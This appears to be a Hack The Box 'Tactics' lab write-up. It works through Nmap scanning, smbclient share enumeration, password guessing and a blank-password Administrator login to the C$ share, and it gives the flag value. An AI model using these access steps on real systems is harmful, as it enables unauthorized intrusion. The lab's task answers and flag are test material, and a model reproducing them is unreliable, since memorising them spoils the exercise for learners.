# Metadata
IP: 10.129.90.201
Date accessed: 2/15/2022 11:25 AM

# Nmap 
Task 1: Which Nmap switch can we use to enumerate machines when our packets are otherwise blocked by the Windows firewall? `-Pn`

Use tag `-Pn` as hinted by HTB 
`nmap -sV -sV -Pn -oN nmap-init $IP`

````
Nmap scan report for 10.129.90.201
Host is up (0.13s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:window
````
Task 2: what does SMB stands for? `Server Message Block`
## Task 3: what port does SMb operate at: 
`445`

Looks like they want us to use SMBClient, and this server has an SMB vuln

## Task 4:What command line argument do you give to `smbclient` to list available shares? 

Let's check the help menu `smbclient -h`
Found :`[-L|--list=HOST]`. answer `-L`

## Task 5: What character at the end of a share name indicates it's an administrative share? 
Let's run the smbclient on our victim machine to find out 

`smbclient -L $IP`
We got a password prompt. Trying common password or blank pw
admin, root, password, password1, admin123... 

no password above works: 
`session setup failed: NT_STATUS_ACCESS_DENIED
`

The next logical step for SMB attack is to guess a username. The most common admin name for SMB is `Administrator`, let's try that

`smbclient -L $IP -U Administrator`. When prompted for a password just hit enter 

````
Enter WORKGROUP\Administrator's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.90.201 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

````

Answer to Task 5 `$`

## Task 6: Which Administrative share is accessible on the box that allows users to view the whole file system? 
I guessed `C$` because the answer only has 2 letters and that was the only share with 2 letters lol. But let's check that

Checking my quick notes on SMB cmd
> cmd I use
`smbclient -L \\\\<IP>`
`smbclient \\\\<IP>\\<ShareNAME>`

In this case since we already got in with the `Adminstrator` user, let's keep using that

`smbclient \\\\$IP\\C$ -U Administrator`


Looks correct
````
Current directory is \\10.129.90.201\C$\
smb: \> ls
  $Recycle.Bin                      DHS        0  Wed Apr 21 11:23:49 2021
  Config.Msi                        DHS        0  Wed Jul  7 14:04:56 2021
  Documents and Settings          DHSrn        0  Wed Apr 21 11:17:12 2021
  pagefile.sys                      AHS 738197504  Tue Feb 15 11:22:12 2022
  PerfLogs                            D        0  Sat Sep 15 03:19:00 2018
  Program Files                      DR        0  Wed Jul  7 14:04:24 2021
  Program Files (x86)                 D        0  Wed Jul  7 14:03:38 2021
  ProgramData                        DH        0  Wed Apr 21 11:31:48 2021
  Recovery                         DHSn        0  Wed Apr 21 11:17:15 2021
  System Volume Information         DHS        0  Wed Apr 21 11:34:04 2021
  Users                              DR        0  Wed Apr 21 11:23:18 2021
  Windows                             D        0  Wed Jul  7 14:05:23 2021

		3774463 blocks of size 4096. 1159976 blocks available


````
Getting in to the user's desktop

````
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Thu Apr 22 03:16:03 2021
  ..                                 DR        0  Thu Apr 22 03:16:03 2021
  desktop.ini                       AHS      282  Wed Apr 21 11:23:32 2021
  flag.txt                            A       32  Fri Apr 23 05:39:00 2021

		3774463 blocks of size 4096. 1157925 blocks available

````

Getting the flag file 

````
smb: \Users\Administrator\Desktop\> get flag.txt
getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
````
Go back to your kali machine to get the flag
```
┌──(root💀kali)-[~/Offensive-Security/HackTheBox/Tactics]
└─# cat flag.txt 
f751c19eda8f61ce81827e6930a1f40c    

```
# Task 7:  What command can we use to download the files we find on the SMB Share? 

`get`

# Task 8: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system? 

Google `Impacket interactive shell`

found answer: `psexec.py`

# Submit root flag, check task 6
